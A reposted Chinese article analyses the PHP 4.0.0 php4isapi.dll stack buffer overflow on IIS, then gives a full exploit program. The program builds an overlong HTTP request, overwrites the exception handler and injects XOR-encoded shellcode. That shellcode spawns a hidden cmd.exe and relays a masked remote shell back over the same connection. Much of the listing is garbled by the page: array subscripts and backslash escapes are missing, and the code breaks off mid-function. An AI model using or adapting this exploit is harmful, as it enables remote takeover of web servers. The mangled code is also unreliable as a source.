php4.0.0远程溢出源代码分析与测试程序

2006-03-28 12:09作者:佚名来源:本站整理浏览:389 评论:0
php4.0.0才出来的时候,我们测试发现php4isapi.dll有缓冲溢出漏洞,下面是php4isapi.c的相关源代码:

/*
 * Copies the ISAPI server variables (the entries of isapi_server_variables,
 * then PHP_SELF and the headers packed in ALL_HTTP) from IIS into PHP's
 * track_vars array for the current request.
 *
 * Excerpt of php4isapi.c as shipped with PHP 4.0.0; the article author's
 * inline commentary (originally Chinese) is translated in place below.
 *
 * Security note: GetServerVariable() treats *variable_len as the size of the
 * destination buffer on input and overwrites it with the length it needed on
 * output. Every lookup that targets the fixed-size stack buffer
 * static_variable_buf must therefore reset variable_len to
 * ISAPI_SERVER_VAR_BUF_SIZE first. The loop and the ALL_HTTP lookup do; the
 * PHP_SELF lookup does not, which is the stack overflow this article is about.
 */
static void sapi_isapi_register_server_variables(zval *track_vars_array ELS_DC SLS_DC PLS_DC)
{
/* Fixed-size stack buffer reused by every lookup below. */
char static_variable_buf[ISAPI_SERVER_VAR_BUF_SIZE];
char *variable_buf;
/* In/out length for GetServerVariable: buffer size in, bytes needed out. */
DWORD variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
char *variable;
char *strtok_buf = NULL;
LPEXTENSION_CONTROL_BLOCK lpECB;
char **p = isapi_server_variables;

lpECB = (LPEXTENSION_CONTROL_BLOCK) SG(server_context);

/* Register the standard ISAPI variables */
while (*p) {
 /* Correct pattern: the in/out length is reset before each lookup. */
 variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
 if (lpECB->GetServerVariable(lpECB->ConnID, *p, static_variable_buf, &variable_len)
  && static_variable_buf[0]) {
  php_register_variable(*p, static_variable_buf, track_vars_array ELS_CC PLS_CC);
 } else if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) {
  /* The value did not fit: variable_len now holds the required size, which
   * is larger than the stack buffer, and nothing resets it after the loop. */
  variable_buf = (char *) emalloc(variable_len);
  if (lpECB->GetServerVariable(lpECB->ConnID, *p, variable_buf, &variable_len)
   && variable_buf[0]) {
   php_register_variable(*p, variable_buf, track_vars_array ELS_CC PLS_CC);
  }
  efree(variable_buf);
 }
 p++;
}

/* PHP_SELF support */
/* Stack buffer overflow: variable_len is whatever the last loop iteration left
 * in it, so it can exceed sizeof static_variable_buf while the destination is
 * still that stack buffer. The fix is the same reset the ALL_HTTP lookup below
 * already performs, placed before this call:
 *   variable_len = ISAPI_SERVER_VAR_BUF_SIZE;
 */
#ifdef WITH_ZEUS
if (lpECB->GetServerVariable(lpECB->ConnID, "PATH_INFO", static_variable_buf, &variable_len)
#else
if (lpECB->GetServerVariable(lpECB->ConnID, "SCRIPT_NAME", static_variable_buf, &variable_len)

/*  Author's note: this is where the PHP 4.0.0 buffer overflow is. At this point
    variable_len still holds the value returned by the previous GetServerVariable call.  */
/*  Author's note: fixed in PHP 4.0.3.  */

#endif
 && static_variable_buf[0]) {
 php_register_variable("PHP_SELF", static_variable_buf, track_vars_array ELS_CC PLS_CC);

/*
  Author's note: because the function's own arguments are overwritten by the
  overflow and are hard to reproduce, a classic return-address overwrite does
  not work here (this call cannot return normally); the author instead targets
  the exception-handler structure, see the author's related article.
*/


}

/* Register the internal bits of ALL_HTTP */

/* Correct pattern: reset the length before reusing the stack buffer. */
variable_len = ISAPI_SERVER_VAR_BUF_SIZE;

if (lpECB->GetServerVariable(lpECB->ConnID, "ALL_HTTP", static_variable_buf, &variable_len)) {
 variable_buf = static_variable_buf;
} else {
 if (GetLastError()==ERROR_INSUFFICIENT_BUFFER) {
  variable_buf = (char *) emalloc(variable_len);
  if (!lpECB->GetServerVariable(lpECB->ConnID, "ALL_HTTP", variable_buf, &variable_len)) {
   efree(variable_buf);
   return;
  }
 } else {
  return;
 }
}
/* Split ALL_HTTP into lines; each line is "NAME: value". NOTE(review): the
 * separator literal reads "" here -- the page rendering appears to have dropped
 * backslash escapes, so check the original source before relying on it. */
variable = php_strtok_r(variable_buf, "", &strtok_buf);
while (variable) {
 char *colon = strchr(variable, ':');

 if (colon) {
  char *value = colon+1;

  /* Skip the blanks after the colon. */
  while (*value==' ') {
   value++;
  }
  /* Terminate the name at the colon only for the duration of the call. */
  *colon = 0;
  php_register_variable(variable, value, track_vars_array ELS_CC PLS_CC);
  *colon = ':';
 }
 variable = php_strtok_r(NULL, "", &strtok_buf);
}
/* Only the heap copy is freed; the stack buffer is not. */
if (variable_buf!=static_variable_buf) {
 efree(variable_buf);
}
}

   因为形参的问题,采用的覆盖异常处理结构的办法使得shellcode代码得到控制。但因为异常结构代码相对不统一,可能需要根据被攻击系统的WINDOWS版本调整相关参数。具体攻击测试代码:

/*  
    php4.0  overflow program phphack.c ver 1.0
    copy by yuange <yuange@163.net>  2000.08.16

*/  

#include <windows.h>
#include <winsock.h>
#include <stdio.h>
#include <httpext.h>
// #define  DEBUG

//#define  RETEIPADDR  eipwin2000
// Length of the 8-byte NOP marker (fnendstr) that ends each inline-asm body.
#define  FNENDLONG   0x08
// Filler byte for the request buffer.
#define  NOPCODE     'B'    // INC EDX    0x90
// Distance from OVERADD at which the encoded payload is placed.
#define  NOPLONG     0x3c
// Size of the send and receive buffers in main().
#define  BUFFSIZE    0x20000



// Offset inside the request at which the overwrite records are written.
// NOTE(review): the expansion is not parenthesised; it is only ever used as
// `int OVERADD=RETEIPADDRESS;`, where that is harmless.
#define  RETEIPADDRESS 0x900+4
// Pipe I/O buffer size inside shellcodefn().
#define  SHELLBUFFSIZE 0x800
// Number of entries in the API name table (shellcodefn resolves indexes 1..8).
#define  SHELLFNNUMS   9
// XOR key applied to every payload byte by the encoder in main() and the decoder stub.
#define  DATAXORCODE   0xAA
// Modulus and seed of the keystream that masks the interactive channel
// (identical state is kept by main() and shellcodefn()).
#define  LOCKBIGNUM    19999999
#define  LOCKBIGNUM2   13579139

// Defined but not referenced anywhere in this listing.
#define  SHELLPORT   0x1f90   //0x1f90=8080
// Default web server port when argv[2] is absent or zero.
#define  WEBPORT     80  

void     shellcodefnlock();
void     shellcodefn(char *ecb);

void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

/*
 * Entry point of the author's PHP 4.0.0/Win32 test program.
 *
 * As written it builds one HTTP request whose URI overflows the fixed-size
 * stack buffer in php4isapi's server-variable handling, embeds a small decoder
 * stub plus the XOR-encoded bytes of shellcodefn() (both copied out of this
 * very executable at run time), sends it, and then keeps the TCP connection
 * open as an interactive channel whose bytes are masked with a keystream
 * seeded from LOCKBIGNUM/LOCKBIGNUM2 on both ends.
 *
 * Arguments: argv[1] server (prompted for when absent), argv[2] web port
 * (default WEBPORT), argv[4] optional replacement request line, argv[6]
 * "debug" executes the built buffer locally instead of sending it.
 *
 * Build/runtime assumptions: MSVC on x86 (inline _asm, _chkesp, the 0xe9
 * thunk walk), Winsock 1.1, and return addresses hard-coded for particular
 * Chinese Windows NT/2000 builds (see the author's note at eipjmpebx).
 *
 * NOTE(review): the listing as shown on this page does not compile -- the
 * page rendering has dropped every "[i]" subscript (e.g. `recvbuff!=' '`,
 * `temp=shellcodebuff;`, `buff^=lockcharvar;`) and the backslashes of escape
 * sequences (`"x0d"`, `'\'`). Compare with the original before drawing
 * conclusions from individual lines.
 *
 * Defender notes: on the wire the request is `GET /default.htmp4` followed by
 * a URI more than 0x900 bytes long consisting mostly of the single filler
 * byte NOPCODE ('B'), then ` HTTP/1.1 HOST:<server>`; a compromised server
 * answers with the literal marker "XORDATA" before the masked session starts.
 * The tool itself reads its own user input with the unbounded gets().
 */
int main(int argc, char **argv)
{
 char *server;
 // String table appended (encoded) after the payload: the API names resolved
 // at run time, the command to spawn, the "exit" line used to shut the shell
 // down, the XORDATA marker, and the "strend" terminator that bounds the copy
 // below. Each "x0" is a "\x0" separator whose backslash was lost in rendering.
 char *str="LoadLibraryA""x0""CreatePipe""x0"
      "CreateProcessA""x0""CloseHandle""x0"
      "PeekNamedPipe""x0"
      "ReadFile""x0""WriteFile""x0"
      "Sleep""x0"
      "cmd.exe""x0""x0dx0a""exit""x0dx0a""x0"
      "XORDATA""x0"
      "strend";
 // Request line prefix and suffix; the overflow data sits between them.
 char buff1[]="GET /default.htmp4";
 char buff2[]=" HTTP/1.1 HOST:";
 // Eight 0x90 bytes: the marker that ends each inline-asm function body.
 char *fnendstr="x90x90x90x90x90x90x90x90x90";
 char SRLF[]="x0dx0ax00x00";  

 
 // Hard-coded addresses (little-endian) for specific Windows builds; only
 // eipjmpebx is actually used below.
 char  eipjmpesp[]   ="xb7x0exfax7f";
// push esp
// ret
 char  eipexcept[]="xb8x0exfax7F";
// ret
 char  eipjmpesi[]="x08x88xfax7F";  
 char  eipjmpedi[]="xbex8bxfax7F";  
 char  eipjmpebx[]="x73x67xfax7F";  
//  push ebx
//  ret
/*
  Author's note: address of the `jmp ebx` code; fixed on Chinese WinNT and
  Chinese Win2000, located in the c_936.nls module. When Win2000 invokes the
  exception-handler code, ebx points to the exception record; on older WinNT
  it is esi (use 7ffa8808), on later versions edi (use 7ffa8bbe).
*/

 char    buff[BUFFSIZE];
 char    recvbuff[BUFFSIZE];
 char    shellcodebuff[0x1000];
 struct  sockaddr_in s_in2,s_in3;
 struct  hostent *he;
 char    *shellcodefnadd,*chkespadd;
 unsigned  int sendpacketlong;
//  unsigned
 int i,j,k;
 unsigned  char temp;
 int     fd;
 u_short port,port1,shellcodeport;
 SOCKET  d_ip;
 WSADATA wsaData;
 int offset=0;
 int xordatabegin;
 // Keystream state; shellcodefn() keeps matching state on the other end.
 int  lockintvar1,lockintvar2;
 char lockcharvar;
 // Offset inside buff around which the 8-byte overwrite records are written;
 // the offset-adjustment code is commented out, so this is always RETEIPADDRESS.
 int OVERADD=RETEIPADDRESS;
 int result;

 fprintf(stderr," PHP4.0 FOR WIN32 OVERFLOW PROGRAM 2.0 .");
 fprintf(stderr," copy by yuange 2000.8.16.");
 fprintf(stderr," wellcome to my homepage http://yuange.yeah.net .");
 fprintf(stderr," welcome  to http://www.nsfocus.com .");
 fprintf(stderr," usage: %s <server> [webport] ", argv[0]);

 
 // No server on the command line: prompt for one. gets() is unbounded, and
 // recvbuff doubles as the receive buffer later on.
 if(argc <2){
     fprintf(stderr," please enter the web server:");
     gets(recvbuff);
     // Skip leading spaces ("[i]" subscript lost in rendering).
     for(i=0;i<strlen(recvbuff);++i){
\t if(recvbuff!=' ') break;
     }

     server=recvbuff;
     if(i<strlen(recvbuff)) server+=i;
/*
     fprintf(stderr," please enter the offset(0-3):");
     gets(buff);
     for(i=0;i<strlen(buff);++i){
\t  if(buff!=' ') break;
     }
     offset=atoi(buff+i);      
*/
   }


 result= WSAStartup(MAKEWORD(1, 1), &wsaData);
 if (result != 0) {
\tfprintf(stderr, "Your computer was not connected "
\t    "to the Internet at the time that "
\t    "this program was launched, or you "
\t    "do not have a 32-bit "
\t    "connection to the Internet.");
\texit(1);
   }

/*
 if(argc>2){
  offset=atoi(argv[2]);
 }
 OVERADD+=offset;
 if(offset<0||offset>3){
    fprintf(stderr," offset error !offset  0 - 3 .");
    gets(buff);
    exit(1);
 }

 */
 


 // Empty branch left over from commented-out cleanup; in that case server
 // already points into recvbuff.
 if(argc <2){
 //     WSACleanup( );    
//       exit(1);
 }
 else  server = argv[1];

 // Normalise the server string: skip leading spaces, drop a "scheme://" or
 // "scheme:\\" prefix, and cut at the first '/' or '\'. The '\' character
 // literals read as `'\'` because a backslash was lost in rendering.
 for(i=0;i<strlen(server);++i){
    if(server!=' ')
    break;
 }
 if(i<strlen(server)) server+=i;

 for(i=0;i+3<strlen(server);++i){
     
     if(server==':'){
\t  if(server[i+1]=='\'||server[i+1]=='/'){
\t      if(server[i+2]=='\'||server[i+2]=='/'){
\t\t  server+=i;
\t\t  server+=3;
\t\t  break;
\t      }
\t  }
     }
 }
 for(i=1;i<=strlen(server);++i){
     if(server[i-1]=='\'||server[i-1]=='/') server[i-1]=0;
 }

 // Resolve the host: dotted quad first, then DNS.
 d_ip = inet_addr(server);
 if(d_ip==-1){
    he = gethostbyname(server);
    if(!he)
    {
      WSACleanup( );
      printf(" Can't get the ip of %s !",server);
      gets(buff);
      exit(1);    
    }
    else    memcpy(&d_ip, he->h_addr, 4);
 }    
 
 if(argc>2) port=atoi(argv[2]);
 else   port=WEBPORT;
 if(port==0) port=WEBPORT;

 // TCP socket with an 8000 ms receive timeout; return values are not checked.
 fd = socket(AF_INET, SOCK_STREAM,0);
 i=8000;
 setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
\t
 s_in3.sin_family = AF_INET;
 s_in3.sin_port = htons(port);
 s_in3.sin_addr.s_addr = d_ip;
 printf(" nuke ip: %s port %d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
 
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct sockaddr_in))!=0)
{\t
    closesocket(fd);
    WSACleanup( );
    fprintf(stderr,"  connect err.");
    gets(buff);
    exit(1);
}
 
 // Locate the real body of the CRT's _chkesp(): an MSVC debug build reaches
 // each function through a 0xe9 (jmp rel32) thunk, which is followed here.
 // cleanchkesp() later uses this address to strip the compiler-inserted calls.
 _asm{
\t mov ESI,ESP
\t cmp ESI,ESP
 }
 _chkesp();
 chkespadd=_chkesp;
 temp=*chkespadd;
 if(temp==0xe9) {
\t ++chkespadd;
\t i=*(int*)chkespadd;
\t chkespadd+=i;
\t chkespadd+=4;
 }

 // Same thunk walk for the decoder stub, then find its first 8-NOP marker.
 shellcodefnadd=shellcodefnlock;
 temp=*shellcodefnadd;
 if(temp==0xe9) {
\t ++shellcodefnadd;
\t k=*(int *)shellcodefnadd;
\t shellcodefnadd+=k;
\t shellcodefnadd+=4;
 }

 for(k=0;k<=0x500;++k){
\t if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 }
 // Fill the whole request with the filler byte, put the request line in
 // front (argv[4] may replace it), and copy 0x80 raw bytes of the decoder
 // stub, starting 4 bytes into its marker, to OVERADD+0x60+NOPLONG.
 memset(buff,NOPCODE,BUFFSIZE);
 if(argc>4){
    memcpy(buff,argv[4],strlen(argv[4]));
 }
 else  memcpy(buff,buff1,strlen(buff1));
 // strcpy(buff,buff1);
// memset(buff+strlen(buff),NOPCODE,1);

   memcpy(buff+OVERADD+0x60+NOPLONG,shellcodefnadd+k+4,0x80);
//  memcpy(buff+NOPLONG,shellcodefnadd+k+4,0x80);
   
 // Copy the body of shellcodefn() (up to its marker) into shellcodebuff,
 // strip its _chkesp calls, and append the string table up to "strend".
 shellcodefnadd=shellcodefn;
 temp=*shellcodefnadd;
 if(temp==0xe9) {
\t  ++shellcodefnadd;
\t k=*(int *)shellcodefnadd;
\t shellcodefnadd+=k;
\t shellcodefnadd+=4;
 }
 

 for(k=0;k<=0x1000;++k){
\t if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
 }

 memcpy(shellcodebuff,shellcodefnadd,k);   //j);
 cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
 for(i=0;i<0x400;++i){
     if(memcmp(str+i,"strend",6)==0) break;
 }    
 memcpy(shellcodebuff+k,str,i);


 // sendpacketlong is the payload length for now. Find the end marker of the
 // decoder stub inside buff; the encoded payload is written from there on.
 sendpacketlong=k+i;
 for(k=0;k<=0x200;++k){
\t if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;

//\t if(memcmp(buff+NOPLONG+k,fnendstr,FNENDLONG)==0) break;

 }

 
 
 
 // Encode the payload byte by byte: XOR with DATAXORCODE, and escape any
 // result that is a control byte or one of ' ' '.' '/' '\' '0' '?' '%' as a
 // '0' followed by (byte+0x40). The decoder stub reverses exactly this.
 // (`temp=shellcodebuff;` has lost its "[i]" in rendering.)
 for(i=0;i<sendpacketlong;++i){
\t temp=shellcodebuff;
\t temp^=DATAXORCODE;
\t if(temp<=0x10||temp==' '||temp=='.'||temp=='/'||temp=='\'||temp=='0'||temp=='?'||temp=='%'){
\t   buff[OVERADD+NOPLONG+k]='0';

   //       buff[NOPLONG+k]='0';
\t   ++k;
\t   temp+=0x40;
\t }
\t  buff[OVERADD+NOPLONG+k]=temp;

    //    buff[NOPLONG+k]=temp;
\t ++k;
}

 

//  memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
//  k+=sendpacketlong;


/*
 for(i=-0x30;i<0x30;i+=4){
   memcpy(buff+OVERADD+i,eipexcept,4);
 }
 memcpy(buff+OVERADD+i,eipjmpesp,4);
*/
 // Around OVERADD write repeated 8-byte records: 4 bytes of filler
 // ("x42x42x42x2D", escapes lost) followed by eipjmpebx, then a fixed
 // 24-byte sequence after the last record (i is 0x40 when the loop ends).
 for(i=-40;i<0x40;i+=8){
    memcpy(buff+OVERADD+i,"x42x42x42x2D",4);
    memcpy(buff+OVERADD+i+4,eipjmpebx,4);
 }
 memcpy(buff+OVERADD+i+8,"x42x42x42x42x61x61x61x61x61x61x61x61x61x61x61x61x5bxffx63x64x42x42x42x42",24);



//  fprintf(stderr," offset:%d",offset);



  /*

 192.168.8.48
 if(argc>2){
     server=argv[2];
     if(strcmp(server,"win9x")==0){
\t  memcpy(buff+OVERADD,eipwin9x,4);
\t  fprintf(stderr," nuke win9x.");
     }
     if(strcmp(server,"winnt")==0){
\t  memcpy(buff+OVERADD,eipwinnt,4);
\t  fprintf(stderr," nuke winnt.");
     }
     
 }

*/

 // Terminate the request with " HTTP/1.1 HOST:" + server. Because the
 // filler is 'B', strlen(buff) then measures the whole request. The strcpy
 // of "" is a no-op as shown (its escapes were presumably lost too).
 sendpacketlong=k+OVERADD+i+NOPLONG;
//sendpacketlong=k+NOPLONG;

strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);

 sendpacketlong=strlen(buff);
// buff[sendpacketlong]=0x90;
strcpy(buff+sendpacketlong,"");
/*
buff[sendpacketlong]=0x90;
for(i=-0x30;i<0x30;i+=4){
   memcpy(buff+sendpacketlong+OVERADD+i,eipexcept,4);
 }
 memcpy(buff+sendpacketlong+OVERADD+i,eipwinnt,4);

 strcpy(buff+sendpacketlong+OVERADD+i+4,"xffx63x64");
 
 strcpy(buff+sendpacketlong+OVERADD+i+20,"");
*/

// printf(" send buff:%s",buff);
//  strcpy(buff+OVERADD+NOPLONG,shellcode);
 sendpacketlong=strlen(buff);

/*
#ifdef DEBUG
 _asm{
     lea esp,buff
\tadd esp,OVERADD
     ret

 }
#endif

*/
 // argv[6]=="debug": point esp into the built buffer and "return" into it,
 // i.e. execute the payload inside this process instead of sending it.
 if(argc>6) {
     if(strcmp(argv[6],"debug")==0)     {
\t    _asm{
\t     lea esp,buff
\t     add esp,OVERADD
\t     ret
\t    }
     }
 }



 // Send the request once and look for the XORDATA marker in the reply, which
 // signals that the payload is running and the masked channel is up.
 xordatabegin=0;
 for(i=0;i<1;++i){
    j=sendpacketlong;
    fprintf(stderr," send  packet %d bytes.",j);
//     fprintf(stderr," sned:%s ",buff);
    send(fd,buff,j,0);
    k=recv(fd,recvbuff,0x1000,0);
    if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
\t  xordatabegin=1;
\t  k=-1;
\t  fprintf(stderr," ok!");
    }
    if(k>0){
\t recvbuff[k]=0;
\t fprintf(stderr,"  recv: %s",recvbuff);
    }

 }

 // Non-blocking mode for the relay loop: recv() then returns a negative
 // value when nothing is pending, which is used as "ask the user for input".
 k=1;
 ioctlsocket(fd, FIONBIO, &k);

// fprintf(stderr," now begin: ");

 // Keystream seeds: lockintvar2 masks what is sent, lockintvar1 unmasks what
 // is received.
 lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
 lockintvar2=lockintvar1;


/*
 for(i=0;i<strlen(SRLF);++i){
\t  SRLF^=DATAXORCODE;
 }
 send(fd,SRLF,strlen(SRLF),0);
 send(fd,SRLF,strlen(SRLF),0);
 send(fd,SRLF,strlen(SRLF),0);
*/
 // Relay loop: k<0 -> read a line from the user, append CRLF and send it
 // masked; k==0 -> peer closed. Each byte is XORed with the next keystream
 // byte: state = state*0x100 % LOCKBIGNUM, key = state % 0x100.
 // (`buff^=lockcharvar;` has lost its "[i]" in rendering.)
 k=1;
 while(k!=0){
     if(k<0){
\t  gets(buff);
\t  k=strlen(buff);
\t  memcpy(buff+k,SRLF,3);
   //      send(fd,SRLF,strlen(SRLF),0);
   //      fprintf(stderr,"%s",buff);
\t  for(i=0;i<k+2;++i){
\t\tlockintvar2=lockintvar2*0x100;
\t\tlockintvar2=lockintvar2%LOCKBIGNUM;
\t\tlockcharvar=lockintvar2%0x100;
\t\tbuff^=lockcharvar;   // DATAXORCODE;
//\t      buff^=DATAXORCODE;
\t  }
\t     send(fd,buff,k+2,0);
//\t  send(fd,SRLF,strlen(SRLF),0);
     }
     k=recv(fd,buff,0x1000,0);
     if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0) {
\t  xordatabegin=1;
\t  k=-1;
     }

     if(k>0){
//\t  fprintf(stderr,"recv %d bytes",k);
\t  if(xordatabegin==1){
\t      for(i=0;i<k;++i){
\t\tlockintvar1=lockintvar1*0x100;
\t\tlockintvar1=lockintvar1%LOCKBIGNUM;
\t\tlockcharvar=lockintvar1%0x100;
\t\tbuff^=lockcharvar;   // DATAXORCODE;
\t      }
\t  }
\t  buff[k]=0;
\t  fprintf(stderr,"%s",buff);
     }
//      if(k==0) break;
 }  
 closesocket(fd);
 WSACleanup( );
 fprintf(stderr," the server close connect.");
 gets(buff);
 return(0);
}
/*
 * Decoder stub, never called as a C function. main() copies 0x80 raw bytes of
 * this body (from 4 bytes into the first 8-NOP marker) into the request at
 * OVERADD+0x60+NOPLONG, so the ".php4?" bytes emitted after the marker land
 * in the request URI and the code that follows runs first once control is
 * redirected.
 *
 * Flow: `next` calls `getediadd`, which pops its own return address (the
 * `shell` label) into EDI and ESI. It then decodes the bytes that follow in
 * place, reversing the encoder loop in main(): each byte is XORed with
 * DATAXORCODE, except that a '0' byte means "take the next byte minus 0x40"
 * (`clean0`). A zero byte ends decoding (`cmp al,cl` with ecx cleared) and
 * execution jumps to `shell`, i.e. into the decoded shellcodefn() body,
 * with ebx pushed twice as that function's argument and return address (the
 * author's note in main() says ebx holds the ECB pointer at that point).
 */
void  shellcodefnlock()
{
      _asm{
\t      nop
\t      nop
\t      nop
\t      nop
\t      nop
\t      nop
\t      nop
\t      nop
\t      _emit('.')

\t      _emit('p')
\t      _emit('h')
\t      _emit('p')
\t      _emit('4')
\t      _emit('?')


\t      jmp   next
getediadd:      pop   EDI
\t      push  EDI
\t      pop   ESI
\t      push  ebx    //  ecb
\t      push  ebx\t       //  call shellcodefn ret address
\t      xor   ecx,ecx
looplock:     lodsb
\t      cmp  al,cl
\t      jz   shell
\t      cmp  al,0x30
\t      jz   clean0
sto:\t  xor  al,DATAXORCODE
\t      stosb
\t      jmp  looplock
clean0:       lodsb
\t      sub al,0x40
\t      jmp sto
next:\t call  getediadd
shell:\t   NOP
\t      NOP
\t      NOP
\t      NOP
\t      NOP
\t      NOP
\t      NOP
\t      NOP
\t      
   }
}\t

/*
 * Position-independent payload that runs inside the IIS worker once the
 * decoder stub has restored it. `ecb` is the ISAPI EXTENSION_CONTROL_BLOCK;
 * the code takes ConnID from ecb+8 and the WriteClient/ReadClient callbacks
 * from ecb+0x84/ecb+0x88 so it can talk to the client on the same HTTP
 * connection. It is compiled normally and copied out of the binary by main(),
 * which is why it must not reference any absolute address of its own.
 *
 * Steps: (1) `nextcall`/`getstradd` obtain the address of the string table
 * that main() appended right after this body (`stradd`) and install the
 * `except` record at FS:[0], whose handler `errprogram` rewrites the
 * faulting context's EIP (CONTEXT+0xb8) to the address saved by
 * `getexceptretadd` and returns 0, so a fault during the scan below resumes
 * the loop instead of ending the process (the author's note below); (2) scan
 * 64 KB-aligned addresses for a PE image whose export name is KERNEL32.dll
 * and resolve GetProcAddress from its export table; (3) resolve the API
 * names from the string table into apifnadd[1..SHELLFNNUMS-1]; (4) create two
 * pipes and spawn the "cmd.exe" entry hidden with its standard handles on
 * them; (5) send the "XORDATA" marker, then relay pipe output to the client
 * and client input to the pipe, masking both directions with the same
 * LOCKBIGNUM keystream main() uses. When ReadClient fails it writes the
 * "exit" line to the shell three times and sleeps forever rather than
 * returning into the smashed stack.
 *
 * Code-level observations (code kept byte-identical):
 * - `apifnadd` has one element but is indexed 1..8; this relies on MSVC
 *   placing the FARPROC locals above it contiguously, not on C semantics.
 * - `for(;imgbase<0xbffa0000,procgetadd==0;)` uses the comma operator, so
 *   only `procgetadd==0` is the loop condition; the bound is discarded.
 * - sa.nLength=12 and the 0x11-dword zeroing of siinfo are the 32-bit sizes
 *   of SECURITY_ATTRIBUTES and STARTUPINFO written out by hand.
 * - Comments inside the function have been translated to English.
 */
void shellcodefn(char *ecb)
{    char\tBuff[SHELLBUFFSIZE+2];
   int\t *except[2];


   FARPROC     Sleepadd;
   FARPROC     WriteFileadd;
   FARPROC     ReadFileadd;
   FARPROC     PeekNamedPipeadd;
   FARPROC     CloseHandleadd;
   FARPROC     CreateProcessadd;
   FARPROC     CreatePipeadd;
   FARPROC\tprocloadlib;

   FARPROC     apifnadd[1];
   FARPROC     procgetadd=0;
   FARPROC     writeclient= *(int *)(ecb+0x84);
   FARPROC     readclient = *(int *)(ecb+0x88);
   HCONN       ConnID     = *(int *)(ecb+8) ;
   char\t*stradd;
   int\t imgbase,fnbase,k,l;
   HANDLE      libhandle;   //libwsock32;  
   STARTUPINFO siinfo;

   PROCESS_INFORMATION ProcessInformation;
   HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
   int\t lBytesRead;
   int  lockintvar1,lockintvar2;
   char lockcharvar;

   
   
   SECURITY_ATTRIBUTES sa;
   // Find the string table and register the exception record (see header).
   _asm {\t    jmp    nextcall
\t getstradd:   pop    stradd
\t\t      lea    EDI,except
\t\t      mov    dword ptr FS:[0],EDI
   }
      // except[1] = address of `execptprogram`, 7 bytes before the table.
      except[0]=0xffffffff;
      except[1]=stradd-0x07;

      imgbase=0x77e00000;
      // Records the address of the loop below as the resume point for errprogram.
      _asm{
\t  call getexceptretadd
      }
      for(;imgbase<0xbffa0000,procgetadd==0;){
\t    imgbase+=0x10000;
\t    if(imgbase==0x78000000) imgbase=0xbff00000;
\t    if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
\t\t   fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
\t\t   k=*(int *)(fnbase+0xc)+imgbase;
\t\t   if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
\t\t      libhandle=imgbase;
\t\t      k=imgbase+*(int *)(fnbase+0x20);
\t\t      for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
\t\t\tif(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor')
\t\t\t{
\t\t\t   k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
\t\t\t   k+=*(int *)(fnbase+0x10)-1;
\t\t\t   k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
\t\t\t   procgetadd=k+imgbase;
\t\t\t   break;
\t\t\t}
\t\t      }
\t\t   }
\t    }
\t  }
// Search for the KERNEL32.DLL module base and the address of GetProcAddress.
// Note that the case of a searched page not being mapped is handled here.

\tif(procgetadd==0) goto  die ;

\t    // Resolve each NUL-separated name in the table; stradd is advanced
\t    // past the name after every lookup and ends up at "cmd.exe".
\t    for(k=1;k<SHELLFNNUMS;++k) {
\t\tapifnadd[k]=procgetadd(libhandle,stradd);
\t\tfor(;;++stradd){
\t\t if(*(stradd)==0&&*(stradd+1)!=0) break;
\t\t}
\t\t++stradd;
\t    }

\t    sa.nLength=12;
\t    sa.lpSecurityDescriptor=0;
\t    sa.bInheritHandle=TRUE;

\t    // Pipe 1: shell output -> us; pipe 2: us -> shell input.
\t    CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
\t    CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);


// ZeroMemory(&siinfo,sizeof(siinfo));
\t    _asm{
\t\t lea EDI,siinfo
\t\txor eax,eax
\t\tmov ecx,0x11
\t\trepnz stosd
\t    }
   siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
   siinfo.wShowWindow = SW_HIDE;
   siinfo.hStdInput = hReadPipe2;
   siinfo.hStdOutput=hWritePipe1;
   siinfo.hStdError =hWritePipe1;
   k=0;
//    while(k==0)
//   {
\tk=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
\t// stradd now points at the "exit" line; stradd+9 is the XORDATA marker.
\tstradd+=8;
//    }    
   PeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
   k=8;
   writeclient(ConnID,stradd+9,&k,0);

   // Same seeds as main(): lockintvar2 masks output, lockintvar1 unmasks input.
   lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
   lockintvar2=lockintvar1;

   
   while(1) {
\tPeekNamedPipeadd(hReadPipe1,Buff,SHELLBUFFSIZE,&lBytesRead,0,0);
\tif(lBytesRead>0) {
\t   ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
\t   if(lBytesRead>0) {
\t       for(k=0;k<lBytesRead;++k){
\t\tlockintvar2=lockintvar2*0x100;
\t\tlockintvar2=lockintvar2%LOCKBIGNUM;
\t\tlockcharvar=lockintvar2%0x100;
\t\tBuff[k]^=lockcharvar;   // DATAXORCODE;
//\t\tBuff[k]^=DATAXORCODE;
\t       }
